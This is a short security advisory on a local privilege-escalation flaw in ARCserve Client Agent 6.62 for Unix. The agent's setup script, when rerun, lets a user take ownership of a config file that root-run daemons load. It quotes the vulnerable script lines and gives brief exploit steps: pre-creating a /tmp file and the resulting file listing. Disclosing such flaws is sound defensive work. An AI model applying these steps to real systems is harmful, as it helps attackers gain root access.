|
Vulnerability ARCserve Affected Client Agent 6.62 Description 'zorgon' found following. He discovered a vulnerability in Client Agent 6.62 for Unix. It was tested on a Debian 2.2.14. Client Agent has a hole allowing to execute an arbitrary code by root without its knowing. In the meantime, some conditions are necessary to exploit this vulnerability. Client Agent is used with ARCserveIT, the safe software. It must be installed on all the workstations. A global configuration file agent.cfg keeps every sub-agents installed on your system. This file is in /usr/CYEagent, and receives the information from the sub-agent when the script /opt/uagent/uagensetup is ran. uagent.cfg: debian:/usr/CYEagent# more agent.cfg # #(c) Copyright 1989-1999 Computer Associates International, Inc. #and/or its subsidiaries. All Rights Reserved. Use by the United #States Government is subject to RESTRICTED RIGHTS as set out in #the license agreement. # [0] #[UAGENT] NAME Uagent VERSION 5.0.0 HOME /opt/uagent #ENV CHEY_ENV_DEBUG_LEVEL=4 ENV LD_LIBRARY_PATH=/usr/local/CAlib:/usr/CYEagent:$LD_LIBRARY_PATH ENV SHLIB_PATH=/usr/local/CAlib:/usr/CYEagent:$SHLIB_PATH ENV LIBPATH=/usr/local/CAlib:/usr/CYEagent:$LIBPATH BROWSER asbr AGENT uagentd MERGE umrgd VERIFY umrgd where asbr, uagentd, and umgrd are programms in /opt/uagent. Client Agent is vulnerable only if uagentsetup is run a second time. The first time, it creates the folder /usr/CYEagent and the file agent.cfg, but after it creates a backup of agent.cfg and creates a new agent.cfg without checking permissions. The code in /opt/uagent/uagentsetup: # append lines # case $ANS in y|Y|yes|YES|Yes) cat ${UAGENT_HOME}/.agent.cfg >> ${TMPFILE} || exit 2 ${ECHO} >> ${TMPFILE} || exit 2 mv ${TMPFILE} $dest || exit 2 <------------ ;; esac So anyone can control this file. The modifications to this file will be used when the sub-agent will be stopped and restarted. Exploit: [zorgon@debian /]$ cd /tmp [zorgon@debian /tmp]$ touch uagent.tmp [zorgon@debian /tmp]$ chmod 700 uagent.tmp If uagentsetup is run a second time: [zorgon@debian /]$ ls -lag /usr/CYEagent/ total 176 drwxr-xr-x 3 root root 4096 Jul 19 17:46 . drwxr-xr-x 15 root root 4096 Jul 11 10:37 .. -rw-r--r-- 1 zorgon users 618 Jul 19 17:47 agent.cfg -rw-r--r-- 1 root root 618 Jul 19 17:47 agent.cfg.old -rwxr-xr-x 1 root root 16899 Jul 11 10:37 asagent -rwxr-xr-x 1 root root 105280 Jul 11 10:37 asagentd lrwxrwxrwx 1 root root 11 Jul 12 10:54 li -> /usr/lib/li -rwxr-xr-x 1 root root 27878 Jul 19 17:47 libarclic98_api.so drwxr-xr-x 3 root root 4096 Jul 11 10:37 nls [zorgon@debian /]$ Solution Nothing yet.